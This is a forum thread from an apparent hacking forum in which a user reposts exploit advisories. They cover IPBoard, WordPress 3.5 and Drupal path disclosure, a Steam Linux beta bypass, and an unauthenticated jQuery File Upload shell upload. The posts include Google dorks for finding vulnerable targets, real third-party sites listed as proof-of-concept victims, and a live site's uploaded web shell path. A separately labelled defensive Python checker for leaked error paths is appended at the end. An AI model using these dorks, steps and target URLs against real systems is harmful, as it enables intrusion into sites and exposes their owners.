Iran Cyber Security Team Forum

Private Exploits In 1337day

Thread started by WH!T3 W01F on 28/1/15 in the Vulnerability Laboratory forum

  1. WH!T3 W01F
    Retired administrator

    Status:
    Offline
    Join date:
    7/12/14
    Posts:
    311
    Thanked:
    535
    Gender:
    Location:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    IPBoard 3.x.x/3.4 Full Path Disclosure


    PHP:
    Exploit
    admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login

    Dork
    in****:Community Forum Software by IP.Board

    Fix
    Turn off display_errors in php.ini

    # 1337day.com [2012-12-12]
     
  2. WH!T3 W01F
    Steam Linux Closed Beta bypass authorization

    PHP:
    POC
    0x01 Download the steam client for linux here http://media.steampowered.com/client/installer/steam.deb

    0x02 Login to your account using the Steam Client normally

    0x03 There will be a MsgBox saying that you do not have authorization, Do not click OK, and normally use as if authorization
      
    # 1337day.com [2012-12-12]
     
  3. WH!T3 W01F
    WordPress 3.5 multiple path disclosure vulnerabilities


    PHP:
    # Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities  
    # Date: [12.12.12] 
    # Author: [Cyb3rboy] 
    # Vendor or Software Link: [wordpress.org] 
    # Version: [wordpress 3.5] 
    # Category:: [***apps] 
    # Google dork: [use brain ] 
    # Tested on: [windows] 
     
     
    the following directories are vulnerable to path disclosure vulnerability in wordpress 3.5
      
    /wp-settings.php 
    POC 
    :- http://sqayasia.com/wp-settings.php 
    http://www.way2blogging.org/wp-settings.php 
     
     
    /wp-includes/admin-bar.php 
    POC
    :- http://sqayasia.com/wp-includes/admin-bar.php 
    http://www.way2blogging.org/wp-includes/admin-bar.php 
     
     
      
    /wp-includes/author-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/author-template.php 
    http://www.way2blogging.org/wp-includes/author-template.php 
     
     
    /wp-includes/canonical.php 
    Poc
    :- http://sqayasia.com/wp-includes/canonical.php 
     
     
    /wp-includes/category-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/category-template.php 
    http://www.way2blogging.org/wp-includes/category-template.php 
     
     
    /wp-includes/class-wp-embed.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-embed.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/media.php 
    POc
    :- http://sqayasia.com/wp-includes/media.php 
     
     
    /wp-includes/ms-default-constants.php 
    Poc 
    :- http://sqayasia.com/wp-includes/ms-default-constants.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/ms-default-filters.php 
    Poc
    :- http://sqayasia.com/wp-includes/ms-default-filters.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/ms-settings.php 
    Poc
    :- http://sqayasia.com/wp-includes/ms-settings.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/post.php 
    Poc
    :- http://sqayasia.com/wp-includes/post.php 
    http://www.way2blogging.org 
     
     
    /wp-includes/rss.php 
    Poc
    :- http://sqayasia.com/wp-includes/rss.php 
    http://www.way2blogging.org/wp-includes/rss.php 
     
     
    /wp-includes/user.php 
    Poc
    :- http://sqayasia.com/wp-includes/user.php 
    http://www.way2blogging.org/wp-includes/user.php 
     
     
    /wp-includes/theme.php 
    Poc
    :- http://sqayasia.com/wp-includes/theme.php 
    http://www.way2blogging.org/wp-includes/theme.php 
     
     
    /wp-includes/vars.php 
    Poc
    :- http://sqayasia.com/wp-includes/vars.php 
    http://www.way2blogging.org/wp-includes/vars.php 
     
     
    /wp-includes/class-wp-http-ixr-client.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php 
     
     
    /wp-includes/class-wp-image-editor-gd.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php 
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php 
     
     
    /wp-includes/class-wp-image-editor-imagick.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php 
    http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php 
     
     
    /wp-includes/class-wp-xmlrpc-server.php 
    Poc
    :- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php 
    http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php 
     
     
    /wp-includes/class.wp-scripts.php 
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-scripts.php 
    http://www.way2blogging.org/wp-includes/class.wp-scripts.php 
     
     
    /wp-includes/class.wp-styles.php 
    Poc
    :- http://sqayasia.com/wp-includes/class.wp-styles.php 
    http://www.way2blogging.org/wp-includes/class.wp-styles.php 
     
     
    /wp-includes/comment-template.php 
    Poc
    :- http://sqayasia.com/wp-includes/comment-template.php 
    http://www.way2blogging.org/wp-includes/comment-template.php 
     
     
    /wp-includes/default-filters.php 
    Poc
    :- http://sqayasia.com/wp-includes/default-filters.php 
    http://www.way2blogging.org/wp-includes/default-filters.php 
     
     
    /wp-includes/default-widgets.php 
    Poc
    :- http://sqayasia.com/wp-includes/default-widgets.php 
    http://www.way2blogging.org/wp-includes/default-widgets.php 
     
     
    /wp-includes/feed-atom-comments.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom-comments.php 
    http://www.way2blogging.org/wp-includes/feed-atom-comments.php 
     
     
    /wp-includes/feed-atom.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-atom.php 
    http://www.way2blogging.org/wp-includes/feed-atom.php 
     
     
    /wp-includes/feed-rdf.php 
    Poc
    :-http://sqayasia.com/wp-includes/feed-rdf.php 
    http://www.way2blogging.org/wp-includes/feed-rdf.php 
     
     
    /wp-includes/feed-rss.php 
    Poc
    :-http://sqayasia.com/wp-includes/feed-rss.php 
    http://www.way2blogging.org/wp-includes/feed-rss.php 
     
     
    /wp-includes/feed-rss2-comments.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2-comments.php 
    http://www.way2blogging.org/wp-includes/feed-rss2-comments.php 
     
     
    /wp-includes/feed-rss2.php 
    Poc
    :- http://sqayasia.com/wp-includes/feed-rss2.php 
    http://www.way2blogging.org/wp-includes/feed-rss2.php 
     
     
    /wp-includes/functions.php 
    Poc
    :- http://sqayasia.com/wp-includes/functions.php 
    http://www.way2blogging.org/wp-includes/functions.php  
     
     
    # 1337day.com [2012-12-12]
    Very few thanks :|
     
  4. WH!T3 W01F
    0day jQuery File Upload Plugin Exploit Upload

    PHP:
    Title: 0day jQuery File Upload Plugin Exploit Upload
    Description: The Path /test has the Uploader and your files goes to /server/php/files/
    Date: 06/01/2014
    Author: Mauritania Attacker
    Dork1: intitle:jQuery File Upload Plugin Test
    Dork2: intitle:jQuery File Upload Demo
    Dork3: inurl:/plugins/jquery-file-upload/server/php/
    Dork4: inurl:/js/upload/server/php
    Dork5: inurl:/upload/server/php/files

    POC: www.restylesource.com/tempDirs/upload/test/
    Shell: www.restylesource.com/tempDirs/upload/server/php/files/priv8.php
    Default Shell Path: /php/files/shell.php
     
  5. WH!T3 W01F
    Drupal 6.x->7.18 getimagesize() Bug-0day


    PHP:

        
    # < 02/01/2013 > #
     
        
         
        ###
        # Title : Drupal 6.x->7.18 getimagesize() <= Multiple Vulnerabilities
        # Author : KedAns-Dz
        # E-mail : ked-h (@hotmail.com / @1337day.com)
        # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
        # Web Site : www.1337day.com .net .org
        # FaCeb0ok : http://fb.me/Inj3ct0rK3d
        # TwiTter : @kedans
        # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
        # Platform/CatID : php - remote - Multiple
        # Type : php - proof of concept - webapp 0day
        # Tested on : Windows7
        ###
         
        # <3 <3 Greetings t0 Palestine <3 <3
        # F-ck HaCking, Lov3 Explo8ting !
         
        ### [ Proof Images ] ####
        #
        # [1]> http://i45.tinypic.com/2a7tloz.jpg
        #
        # [2]> http://i50.tinypic.com/2repeyt.jpg
        #
        #########################
         
        ######## [ Proof / Exploit ] ################|=>
         
        ##################
        # [!] Description:
        ------------------
        This Bug in function ' getimagesize() ' is Multiple Vulnerabilities (in Drupal CMS),
        When you Upload NULL Image-Size the Script Can't Read the Image Content and shows you
        some errors, The Attacker can use this bug to get some important information like SQL Info's
        or Disclose the Full Path of drupal.
         
        ############################
        # [1] Full Path Disclosure :
        ----------------------------
        +> Go to add new Content/Article :
        ex : [ http://127.0.0.1/drupal-7.18/node/4#overlay=node/add/article ]
        and upload some NULL image (0 bytes), exn: [ UNION+SELECT+database()#.gif ] (with null content/bytes ok!)
        and Push UPLOAD ... you get error MSG like this ==>
         _________________________________________
        Notice: getimagesize(): Read error! in image_gd_get_info()
        (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
        Notice: getimagesize(): Read error! in image_gd_get_info()
        (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
         _________________________________________
         
        => in this error msg you can see/disclosure the Full Path ^_^ !, ( see the proof image )
         
        #################################
        # [2] Error Based SQL Injection :
        ---------------------------------
        +> The Same steps in the POC [1] , but just POST/Save the Content/Article
        and get this SQL Error MSG (ex:) =>
         __________________________________________________________
        Notice: getimagesize(): Read error! in image_gd_get_info() (line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\system\image.gd.inc).
        PDOException: SQLSTATE[HY000]: General error: 1366 Incorrect integer value: '' for column 'field_image_width' at row 1: INSERT INTO {field_data_field_image}
        (entity_type, entity_id, revision_id, bundle, delta, language, field_image_fid, field_image_alt, field_image_title, field_image_width, field_image_height)
        VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5,
        :db_insert_placeholder_6, :db_insert_placeholder_7, :db_insert_placeholder_8, :db_insert_placeholder_9, :db_insert_placeholder_10);
        Array ( [:db_insert_placeholder_0] => node [:db_insert_placeholder_1] => 7 [:db_insert_placeholder_2] => 7 [:db_insert_placeholder_3] =>
        article [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => 5 [:db_insert_placeholder_7] => [:db_insert_placeholder_8]
        => [:db_insert_placeholder_9] => [:db_insert_placeholder_10] => ) in field_sql_storage_field_storage_write()
        (line 448 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18\modules\field\modules\field_sql_storage\field_sql_storage.module).
         ___________________________________________________________
         
        => you can see in this msg some SQL informations like (some columns name/content ) etc...
         
        #####
        # Happy neW Year 'All Elite Pene-Testers in ( 1337day & PacketStorm ) ^_^ Good Luck in 2013 <3
        #####
         
        #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
        # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
        # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
        # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
        # Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
        # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
        # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
        # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
        #============================================================================================================
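
Added example (not part of the original posts or of the quoted advisories): a Python check that a site owner can run over their own application's response bodies to see whether the path-disclosure messages described in the IP.Board, WordPress and Drupal posts are still rendered to visitors, i.e. whether `display_errors` is still on. The sample bodies are constructed; the Drupal notice is the one quoted above, while the WordPress fatal-error text and its `/srv/www/example` path are assumptions.

```python
import re

# An absolute Windows or Unix path, captured lazily up to the next delimiter.
_PATH = r"(?P<path>(?:[A-Za-z]:\\|/)[^<\n]+?)"
# PHP's built-in format, with or without html_errors markup:
#   Fatal error: <message> in /abs/path/file.php on line 12
PHP_STYLE = re.compile(
    r"\bin\s+(?:<b>)?" + _PATH + r"(?:</b>)?\s+on\s+line\s+(?:<b>)?(?P<line>\d+)")
# Drupal 7's format, as quoted in the Drupal post:
#   Notice: <message> in func() (line 349 of C:\...\image.gd.inc).
DRUPAL_STYLE = re.compile(r"\(line\s+(?P<line>\d+)\s+of\s+" + _PATH + r"\)\.")


def find_path_leaks(body):
    """Return unique (style, path, line) tuples for server paths leaked in body."""
    hits = []
    for style, rx in (("php", PHP_STYLE), ("drupal", DRUPAL_STYLE)):
        for m in rx.finditer(body):
            hits.append((style, m.group("path"), int(m.group("line"))))
    return list(dict.fromkeys(hits))  # de-duplicate, keep first-seen order


def audit(responses):
    """Map each leaking endpoint to its leaks; clean endpoints are omitted."""
    report = {}
    for endpoint, body in responses.items():
        leaks = find_path_leaks(body)
        if leaks:
            report[endpoint] = leaks
    return report


# Constructed sample responses, keyed by the endpoint that produced them.
DRUPAL_NOTICE = (r"Notice: getimagesize(): Read error! in image_gd_get_info() "
                 r"(line 349 of C:\Program Files\EasyPHP-12.1\www\drupal-7.18"
                 r"\modules\system\image.gd.inc).")
SAMPLES = {
    "/node/add/article": DRUPAL_NOTICE + "\n" + DRUPAL_NOTICE,
    "/wp-includes/rss.php": ("<b>Fatal error</b>:  Call to undefined function "
                             "do_action() in <b>/srv/www/example/wp-includes/rss.php"
                             "</b> on line <b>10</b><br />"),
    "/index.php": "<html><body>Welcome</body></html>",
}

if __name__ == "__main__":
    for endpoint, leaks in audit(SAMPLES).items():
        print(endpoint, leaks)
```

An empty report is the expected state once `display_errors` is off and PHP errors go to the server log instead of the page.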

     